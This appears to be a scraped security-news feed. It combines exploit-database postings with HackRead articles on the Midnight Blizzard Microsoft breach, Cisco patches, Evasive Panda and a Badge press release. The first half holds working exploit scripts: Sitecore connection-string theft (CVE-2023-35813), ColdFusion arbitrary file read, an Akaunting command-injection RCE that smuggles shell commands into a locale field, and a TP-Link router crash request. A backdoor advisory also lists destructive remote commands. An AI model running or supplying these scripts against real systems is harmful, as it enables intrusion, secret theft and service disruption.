Sitecore version 8.2 suffers from a remote code execution vulnerability.

    #!/usr/bin/env python3## Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla# Google Dork: N/A# Date: 2024-01-08# Vendor Homepage: https://www.sitecore.com/# Software Link: https://dev.sitecore.net/# Version: 10.3# Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09# Video POC : https://youtu.be/vWKl9wgdTB0import argparseimport requestsfrom urllib.parse import quotefrom rich.console import Consoleconsole = Console()def initial_test(hostname):    # Initial payload to test vulnerability    test_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='TestVulnerability'    />    '''    encoded_payload = quote(test_payload)    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"    headers = {"Content-Type": "application/x-www-form-urlencoded"}    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)    response = requests.post(url, headers=headers, data=data, verify=False)    # Check for the test string in the Content-Type of the response    return 'TestVulnerability' in response.headers.get('Content-Type', '')def get_payload(choice):    # Payload templates for different options    payloads = {        '1': "<%$ ConnectionStrings:core %>",        '2': "<%$ ConnectionStrings:master %>",        '3': "<%$ ConnectionStrings:web %>"    }    base_payload = '''    <%@Register        TagPrefix = 'x'        Namespace = 'System.Runtime.Remoting.Services'        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'    %>    <x:RemotingService runat='server'    Context-Response-ContentType='{}'    />    '''    return base_payload.format(payloads.get(choice, "Invalid"))def main(hostname):    if initial_test(hostname):        print("Exploiting, Please wait...")        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")        print("Select the payload to use:")        print("1: Core connection strings")        print("2: Master connection strings")        print("3: Web connection strings")        payload_choice = input("Enter your choice (1, 2, or 3): ")        payload = get_payload(payload_choice)        encoded_payload = quote(payload)        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"        headers = {"Content-Type": "application/x-www-form-urlencoded"}        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)        response = requests.post(url, headers=headers, data=data)        if 'Content-Type' in response.headers:            print("Content-Type from the response header:")            print("\n")            print(response.headers['Content-Type'])        else:            print("No Content-Type in the response header. Status Code:", response.status_code)    else:        print("The target does not appear to be vulnerable to CVE-2023-35813.")if __name__ == "__main__":    console.print("[bold green]Author: Abhishek Morla[/bold green]")    console.print("[bold red]CVE-2023-35813[/bold red]")    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')    args = parser.parse_args()    main(args.hostname)

Sitecore 8.2 Remote Code Execution

Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360# Google Dork: [not]# Date: [12/28/2023]# Exploit Author: [Youssef Muhammad]# Vendor Homepage: [https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]# Software Link: [https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 andearlier]# Tested on: [Windows, Linux]# CVE : [CVE-2023-26360]import sysimport requestsimport jsonBANNER = """   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████    ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████   ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██   ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██    ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       """RED_COLOR = "\033[91m"GREEN_COLOR = "\032[42m"RESET_COLOR = "\033[0m"def print_banner():    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)    return 0def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):    if not endpoint.endswith('.cfc'):        endpoint += '.cfc'    if target_file.endswith('.cfc'):        raise ValueError('The TARGET_FILE must not point to a .cfc')    targeted_file = f"a/{target_file}"    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})    vars_get = {'method': 'test', '_cfclient': 'true'}    uri = f'{host}{endpoint}'    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)    file_data = None    splatter = '</TD></TD></TD></TH></TH></TH>'    if response.status_code in [404, 500] and splatter in response.text:        file_data = response.text.split(splatter, 1)[0]    if file_data is None:        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')    print(file_data)    # Save the output to a file    output_file_name = 'output.txt'    with open(output_file_name, 'w') as output_file:        output_file.write(file_data)        print(f"The output saved to {output_file_name}")if __name__ == "__main__":    if not 3 <= len(sys.argv) <= 5:        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")        sys.exit(1)    print_banner()    host = sys.argv[1]    target_file = sys.argv[2]    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None    try:        run_exploit(host, target_file, endpoint, proxy_url)    except Exception as e:        print(f"Error: {e}")

Adobe ColdFusion 2018,15 / 2021,5 Arbitrary File Read

Backdoor.Win32.Beastdoor.oq malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/6268df4c9c805c90725dde4fe5ef6fea.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Beastdoor.oqVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1332, makes outbound connections to SMTP port 25 and executes a PE file named svchost.exe dropped in Windows directory. Third party adversaries who can reach an infected host can issue various numeric commands made available by the backdoor.Family: BeastdoorType: PE32MD5: 6268df4c9c805c90725dde4fe5ef6feaVuln ID: MVID-2024-0674Dropped files: svchost.exeDisclosure: 03/09/2024Commands:27 return victims username and computer information5 or 19 will shutdown victims computer6 restart victims computer9 delete all files including program files16 victim computer screen goes black28 returns clipboard information30 terminates the backdoor and deletes it from the systemExploit/PoC:C:\sec>nc64.exe x.x.x.x 13322727VICTIM DESKTOP-2C3IQHO Windows 8.1 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHzC:\WINDOWS\C:\WINDOWS\system32\1565 x 8302.01svchost.exe svchost.exe2828I dont like u30Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Beastdoor.oq MVID-2024-0674 Remote Command Execution

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

    # Exploit Title: Akaunting < 3.1.3 - RCE# Date: 08/02/2024# Exploit Author: u32i@proton.me# Vendor Homepage: https://akaunting.com# Software Link: https://github.com/akaunting/akaunting# Version: <= 3.1.3# Tested on: Ubuntu (22.04)# CVE : CVE-2024-22836#!/usr/bin/python3import sysimport reimport requestsimport argparsedef get_company():  # print("[INF] Retrieving company id...")  res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)  if res.status_code != 302:    print("[ERR] No company id was found!")    sys.exit(3)  cid = res.headers['Location'].split('/')[-1]  if cid == "login":    print("[ERR] Invalid session cookie!")    sys.exit(7)  return ciddef get_tokens(url):  res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)  search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)  if not search_res:    print("[ERR] Couldn't get csrf token")    sys.exit(1)  data = {}  data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')  data['session'] = res.cookies.get('akaunting_session')  return datadef inject_command(cmd):  url = f"{target}/{company_id}/wizard/companies"  tokens = get_tokens(url)  headers.update({"X-Csrf-Token": tokens['csrf_token']})  data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      print("[ERR] Command injection failed!")      sys.exit(4)    print("[INF] Command injected!")def trigger_rce(app, version = "1.0.0"):  print("[INF] Executing the command...")  url = f"{target}/{company_id}/apps/install"  data = {"alias": app, "version": version, "path": f"apps/{app}/download"}  headers.update({"Content-Type":"application/json"})  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      search_res = re.search(r">Exit Code\:.*<", res_data['message'])      if search_res:        print("[ERR] Failed to execute the command")        sys.exit(6)      print("[ERR] Failed to install the app! no command was executed!")      sys.exit(5)    print("[INF] Executed successfully!")def login(email, password):  url = f"{target}/auth/login"  tokens = get_tokens(url)  cookies.update({    'akaunting_session': tokens['session']  })  data = {    "_token": tokens['csrf_token'],    "_method": "POST",    "email": email,    "password": password  }    req = requests.post(url, headers=headers, cookies=cookies, data=data)  res = req.json()  if res['error']:    print("[ERR] Failed to log in!")    sys.exit(8)  print("[INF] Logged in")  cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})    def main():  inject_command(args.command)  trigger_rce(args.alias, args.version)if __name__=='__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-u", "--url", help="target url")  parser.add_argument("--email", help="user login email.")  parser.add_argument("--password", help="user login password.")  parser.add_argument("-i", "--id", type=int, help="company id (optional).")  parser.add_argument("-c", "--command", help="command to execute.")  parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")  parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")  args = parser.parse_args()    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}  cookies = {}  target = args.url  try:    login(args.email, args.password)    company_id = get_company() if not args.id else args.id    main()  except:    sys.exit(0)

Akaunting 3.1.3 Remote Command Execution

There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.

    # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'# Date: 8/12/2023# Exploit Author: Anish Feroz (ZEROXINN)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N#Description:#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.#Usage:#python3 target username password#change port, if required------------------------------------------------POC-----------------------------------------#!/usr/bin/pythonimport requestsfrom requests.auth import HTTPBasicAuthimport base64def send_request(ip, username, password):    auth_url = f"http://{ip}:8082"    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"    credentials = f"{username}:{password}"    encoded_credentials = base64.b64encode(credentials.encode()).decode()    headers = {        "Host": f"{ip}:8082",        "Authorization": f"Basic {encoded_credentials}",        "Upgrade-Insecure-Requests": "1",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    session = requests.Session()        response = session.get(target_url, headers=headers)    if response.status_code == 200:        print("Server Crashed")        print(response.text)    else:        print(f"Script Completed with status code {response.status_code}")ip_address = input("Enter IP address of the host: ")username = input("Enter username: ")password = input("Enter password: ")send_request(ip_address, username, password)

TP-Link TL-WR740N Buffer Overflow / Denial Of Service

By Deeba Ahmed
Midnight Blizzard (aka Cozy Bear and APT29) originally breached Microsoft on January 12, 2024.
This is a post from HackRead.com Read the original post: Russian Midnight Blizzard Hackers Breached Microsoft Source Code

Microsoft confirms that Russian state-sponsored hackers, known as Midnight Blizzard, infiltrated their systems and stole source code. Experts warn of potential zero-day vulnerabilities.

Microsoft has been hit by a significant cybersecurity breach, with the company confirming that Russian hackers infiltrated its infrastructure, compromising valuable source code.

The breach, originally discovered on January 12, 2024, and **reported** on January 19, raised concerns about the potential misuse of proprietary information and the security of millions of users relying on Microsoft’s products and services.

Earlier this year, Microsoft disclosed that Russian state-sponsored hackers referred to as Midnight Blizzard (also known as Nobelium, Cozy Bear, and APT29), have been spying on the email accounts of Microsoft’s team members. The group, known for the **devastating SolarWinds attack**, successfully stole source code in what Microsoft now terms an “ongoing attack.”

Reportedly, the hackers infiltrated a “small percentage of corporate email accounts” and stole internal messages and files in an attack that began in late November 2023. The threat actor compromised a non-production test tenant account using a password spray attack, accessing some Microsoft corporate email accounts, including senior leadership and cybersecurity employees, and exfiltrating emails and documents.

The attackers exploited vulnerabilities in Microsoft’s defences, gaining unauthorized access to a substantial portion of source code, including Windows OS components, Office Suite, and other critical software elements.

****Update from Microsoft****

Previously, Microsoft stated that there was no evidence that the “threat actor had any access to customer environments, production systems, source code, or AI systems.” However, as per Microsoft’s update **published** on March 8, 2024, Midnight Blizzard is using information from corporate email systems to gain unauthorized access, including access to source code repositories and internal systems. Still, the company asserts that there’s no evidence that attackers compromised Microsoft-hosted customer-facing systems.

**Midnight Blizzard** is using various tactics to attack Microsoft, some of which were shared between Microsoft and its customers via emails. Moreover, the company claims hackers increased the attack volume, such as password sprays, by up to 10 times in February compared to January.

Microsoft has increased security investments and coordinated cross-enterprise efforts to counter Midnight Blizzard’s persistent threat. The company is enhancing its security controls, detections, and monitoring, as well as conducting ongoing investigations into the group’s activities.

Hackread will continue to share findings and information as they evolve. Users are advised to implement security updates, report suspicious activity, and adhere to security best practices.

**Ariel Parnes**, former Head of the Israeli Intelligence Service Cyber Department, winner of the Israel Defense Prize for tech innovations in the cyber field, and COO and Co-Founder at SaaS incident response leader, Mitiga, shared the following insights with Hackread.com:

“For advanced nation-state cyber groups, access to a company’s source code is akin to finding the master key to its digital kingdom, opening up avenues for finding new zero-day vulnerabilities: undiscovered security flaws that can be exploited before they’re known to the software creators or the public.”

Ariel warned that “Zero-day vulnerabilities represent a critical threat because there’s no straightforward way to detect them until after they’ve been discovered and disclosed by the software creators. Given this challenging landscape, organizations need to double down on cybersecurity measures focused on proactive defence.”

1.  Microsoft Disables App Installer After It’s Abused for Malware
2.  Fake Ledger App on Microsoft Store to Steal $800k in Crypto
3.  Microsoft Azure Exploited to Create Undetectable Cryptominer
4.  Microsoft Teams External Access Abuses for DarkGate Malware
5.  Microsoft Outlook Flaw Exploited by Russian Forest Blizzard Group

Russian Midnight Blizzard Hackers Breached Microsoft Source Code

MongoDB versions 2.0.1, 2.1.1, 2.1.4, and 2.1.5 appear to suffer from multiple localized password disclosure issues.

    Title: MongoDB MONGOSH Password Exposure VulnerabilityProduct:                   MongoDB databaseTool:                      mongoshAffected Version(s):       2.0.1 , 2.1.1,2.1.4,2.1.5Tested Version(s):         2.0.1 , 2.1.1,2.1.4,2.1.5Risk Level:                LowAuthor of Advisory:        Emad Al-Mousa*****************************************Vulnerability Details:Vulnerability in MongoDB database system "mongosh" which  is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system.MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system.*****************************************Proof of Concept (PoC):Vulnerability No1. : passwordPrompt() showing password displayed in clear textper documentation:https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPromptThe password should not be displayed, however I found out that it appears clearly in the prompt !The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear.admin> use adminalready on db adminadmin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})Enter passwordmongo*****{ ok: 1 }admin>Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth commandMongosh was tested with both “remove”& “remove-redact” modesconfig.set (redactHistory, “remove-redact”)config.set (‘redactHistory’, “remove”)In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_historyContains the password in clear text for historical  commands run for authentication db.auth() and db.createUser  , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen !In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongoshCommands running for database creation db.createUser and db.auth()  are logging the username, password explicitly as shown below:cat mongosh_repl_historyuse admindb.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})*****************************************References:https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompthttps://www.mongodb.com/docs/mongodb-shell/logs/

MongoDB 2.0.1 / 2.1.1 / 2.1.4 / 2.1.5 Local Password Disclosure

By Deeba Ahmed
Cisco announced patches for high-severity vulnerabilities on Wednesday, March 6, 2024.
This is a post from HackRead.com Read the original post: Cisco Fixes High-Severity Code Execution and VPN Hijacking Flaws

Critical security vulnerabilities patched in the Cisco Secure Client VPN application. Update now to protect your VPN connections from credential theft, unauthorized access, and potential code execution. This advisory also details unpatched flaws in Cisco Small Business wireless access points.

Network equipment giant Cisco has addressed critical security flaws impacting its Secure Client enterprise VPN application and endpoint security solutions. For your information, Secure Client is widely used to establish secure Virtual Private Network (VPN) connections. On Wednesday, Cisco announced patches for high-severity vulnerabilities CVE-2024-20337 (CVSS score: 8.2) and CVE-2024-20338 (CVSS score: 7.3).

CVE-2024-20337 is a Carriage Return Line Feed (CRLF) injection vulnerability allowing attackers to execute script code or access sensitive information in a browser if configured with the SAML External Browser feature.

The flaw affects Linux, macOS, and Windows versions of Secure Client, and can be exploited in CRLF injection attacks. CRLF injections are vulnerabilities where attackers inject CR and LF characters into web applications, adding extra headers or causing browsers to ignore original content.

Unauthenticated remote attackers can execute arbitrary scripts or steal sensitive information like users’ valid SAML authentication tokens to establish a remote access VPN session with the affected user’s privileges. However, individual hosts and services would require additional credentials for successful access, Cisco noted in its advisory.

Amazon security researcher Paulos Yibelo Mesfin discovered this flaw and it has been fixed in versions 4.10.04065, 4.10.08025, 5.0, and 5.1.2.42.

> A vulnerability I found in Cisco AnyConnect just got patched. CVE-2024-20337 is a powerful vulnerability. It grants external attackers access to internal networks when network users visit a website under attacker control. Stay vigilant! 🌊🔥⛓️https://t.co/Jy3qz4HJnU
> 
> — Paulos Yibelo (@PaulosYibelo) March 6, 2024

CVE-2024-20338 only affects Cisco Secure Client for Linux and its successful exploitation requires authentication. It can only be exploited by an authenticated, local attacker. The vulnerability allows the attacker to execute arbitrary code on an affected device with root privileges. They can copy a malicious library file to a specific directory and persuade an administrator to restart a specific process. 

Cisco advises enterprise admins to upgrade to one of the fixed versions, as version 5.1.2.42 of the VPN application resolves the bug.

Cisco has announced patches for several medium-severity flaws in AppDynamics Controller and Duo Authentication for Windows Logon and RDP, potentially leading to data leaks and secondary authentication bypass. The tech giant also warned about two flaws in Cisco Small Business 100, 300, and 500 Series wireless access points (APs), tracked as CVE-2024-20335, and CVE-2024-20336.

These flaws allow remote attackers to execute arbitrary code as the root user. However, Cisco won’t patch them because their Wireless APs have reached the end-of-life process. Similarly, the medium-severity flaws will remain unpatched for the same reason. Moreover, Cisco notes that it is not aware of any of these vulnerabilities being exploited in the wild.

Cisco has emphasized the need for cybersecurity vigilance and adopting security best practices. These include regularly updating software, using strong passwords and multi-factor authentication, being cautious with suspicious links, and preferring trustworthy Wi-Fi networks for sensitive VPN connections.

1.  New Cisco Web UI Vulnerability Exploited by Attackers
2.  Cisco Confirms Network Breach After Employee’s Gmail was Hacked
3.  Unpatched Cisco SD-WAN Manager Systems Exposed to DoS Attacks
4.  New Akira Ransomware Targets Businesses via Exploited CISCO VPNs
5.  Cisco Web UI Vulnerability Exploited Massly, Impacting Over 40K Devices

Cisco Fixes High-Severity Code Execution and VPN Hijacking Flaws

By Waqas
Evasive Panda, also identified as BRONZE HIGHLAND and Daggerfly, is carrying out global targeting of Tibetans.
This is a post from HackRead.com Read the original post: Chinese Evasive Panda Targets Tibetans with Nightdoor Backdoor

Cybersecurity researchers at ESET identified the cyberespionage campaign, highlighting how hackers compromised both the Tibetan news website Tibetpost and the website of the Monlam Festival, a significant event in Tibetan Buddhism.

A Chinese-backed hacking group, Evasive Panda (also known as BRONZE HIGHLAND and Daggerfly), has launched a cyberespionage campaign targeting Tibetans globally. The operation, detected in January 2024 by ESET researchers, began in September 2023 and uses a two-fold attack strategy: Watering hole attacks and spreading backdoor.

****What is a Watering hole attack?****

A watering hole attack is a cyberattack strategy where hackers compromise websites that their target victims frequently visit. By injecting malicious code into these websites, the attackers can infect the devices of unsuspecting visitors.

This tactic relies on the trust users have in the compromised websites, leading them to unknowingly download malware or provide sensitive information, making it an effective method for targeting specific groups or organizations.

****Exploiting Religious Gatherings and Software Downloads****

Evasive Panda capitalized on the Monlam Festival, a major Tibetan Buddhist event, by compromising the festival’s website. This “watering hole” attack tricked visitors from specific networks into downloading malware disguised as legitimate software.

As detailed in ESET’s comprehensive technical **blog post**, the attackers also compromised the Tibetan news website Tibetpost to distribute malicious payloads, including backdoors for Windows and unknown malware for macOS.

> The attackers fielded several downloaders, droppers, and backdoors, including MgBot – which is used exclusively by Evasive Panda – and Nightdoor: the latest major addition to the group’s toolkit and which has been used to target several networks in East Asia.
> 
> ESET

****Sophisticated Arsenal for Network Infiltration****

The attackers used a mix of known and unknown tools, including the custom-made Windows backdoor “Nightdoor” alongside the previously linked MgBot malware. This variety suggests a well-equipped and resourceful group.

The backdoored versions of Windows and macOS applications are hosted on the download page of a legitimate website (ESET)

****Targeting Specifics and Exploiting Opportunities****

By exploiting software vulnerabilities and compromising online platforms, Evasive Panda aimed to infiltrate targeted networks. The campaign’s timing, coinciding with the Monlam Festival, highlights their attempt to exploit increased online activity during religious events.

The recent discovery of Evasive Panda’s cyber-espionage campaign targeting Tibetans is consistent with previous actions by Chinese hackers. These groups have a **track record** of targeting Tibetan communities. Additionally, similar tactics have been used in the past to target Uyghurs, employing **evasive Android malware** for their malicious activities.

1.  Android Trojan Virus Attack on Tibetan Activists
2.  Chinese Group ‘Admin338’ Use DropBox To Deliver Their Payload
3.  Chinese facial recognition database tracking Muslims left exposed
4.  Android malware HenBox hits Xiaomi devices, Chinese minority group
5.  Chinese Hackers Were Spying on Taiwan Prior To Upcoming Elections

Chinese Evasive Panda Targets Tibetans with Nightdoor Backdoor

By cyberwire
Badge Launches Partner Program to Expand Availability of its Privacy-Enhancing “Enroll Once and Authenticate on Any Device” Software.
This is a post from HackRead.com Read the original post: Badge Launches Partner Program for ‘Enroll Once and Authenticate Any Device’ Software

**San Francisco, United States / California, March 7th, 2024, Cyberwire** – Identity Data Management and Analytics Provider Radiant Logic Joins Okta and Ping Identity in Partnership with Badge to Enable Privacy-Preserving Authentication.

Badge Inc., the award-winning privacy company enabling Identity without Secrets™, today launched a new Partner Program and welcomed Identity Data Management and Analytics provider Radiant Logic as its newest partner.

Radiant Logic joins Badge’s partner network alongside marquee identity partners, Okta and Ping Identity. The new Badge Partner Program further accelerates the adoption and integration of Badge’s privacy-preserving authentication, enabling even more users to benefit from seamless MFA experiences across any device or application without storing user secrets or private keys.

“We are thrilled to be working with Badge, enabling a best-in-class authentication solution that builds on top of our market-leading identity data management and identity analytics capabilities to provide greater privacy and security to our customers,” said Wade Ellery, Field CTO, of Radiant Logic.

The integration of Badge brings downstream value to Radiant Logic customers, allowing employees to enrol once and log into any application via RadiantOne using their preferred biometrics and factors of choice for a safe and holistic user experience across any device.

By eliminating passwords and stored secrets, Badge bolsters Radiant Logic’s extensible identity data platform to accelerate strategic initiatives such as digital transformation, Zero Trust, automated compliance, and data-driven governance.

****Zero Code Integration, SCIM Support, Resource Portal****

The Badge Partner Program extends best-in-class security platforms such as Radiant Logic, Okta and Ping Identity with unprecedented MFA experiences.

Benefits of joining the Badge Partner Program include:

*   Prioritized access to new features and capabilities leveraging Badge’s unique differentiator, enabling every user to be their cryptographic root of trust.
*   Zero-code integration using standard protocols, including OAuth 2.0, OIDC, SAML, FIDO, TLS, Kerberos, and others, offering effortless compatibility and enhanced functionality across a variety of systems and platforms.
*   SCIM (System for Cross-Domain Identity Management) support quickly syncs users from an organization’s primary directory, eliminating the need to manually create users and automatically ensuring the right users always have access to Badge.
*   Dedicated partner portal with relevant marketing materials to help streamline collaboration and empower partners in promoting Badge’s solutions effectively.
*   Library of technical documentation support to configure Badge in various customer environments, including Windows desktop login, web application single-sign-on, passkeys, legacy applications, etc.
*   Video demos and solution briefs illustrate end-user onboarding and authentication experiences for common use cases, such as uninterrupted device transitions for frontline workers, phishing-resistant account recovery, integration for removing private keys from workflows, etc.

“As organizations continue to realize the importance of privacy-preserving, secure, and user-friendly authentication solutions, our Partner Program is a response to new alliances and integrations with key players across the security ecosystem, moving Badge closer to our vision of becoming the identity backplane of the Internet,” said Charles Herder, Badge Co-founder and MIT Cryptography PhD.

“By fostering collaborations with industry leaders like Radiant Logic, Okta and Ping Identity, who have some of the largest footprints in the industry, we’re building a world where trust and privacy improve user experience and drive business value instead of being in tension with each other. This sets the stage for a more connected and secure online future for everyone.”

Badge renders PII and biometric credential storage obsolete, eliminating passwords, device redirects, and knowledge-based authentication (KBA). With Badge, the user simply enrolls once, and then seamlessly authenticates across ecosystems on any device using authentication factors that are unique and inherent to them.

Biometric factors such as fingerprint or face can be combined with other factors to create a strong and convenient MFA method that does not rely on a specific device or token to authenticate users. Badge empowers users to move freely across devices and platforms without losing access to their accounts or compromising security.

For more information on Badge’s Partner Program including how to join, please contact \[email protected\] for more information or to schedule a demo.

****About Badge****

Badge enables privacy-preserving authentication to every application, on any device, without storing user secrets or PII. Badge’s patented technology allows users to derive private keys on the fly using their biometrics and factors of choice without the need for hardware tokens or secrets. Badge was founded by field-tested cryptography PhDs from MIT and is venture-backed by tier 1 investors. Customers and partners include top Fortune companies across healthcare, banking, retail, and services.

****Contact****

*   **Frances Bigley**
*   **\[email protected\]**

Tag

#windows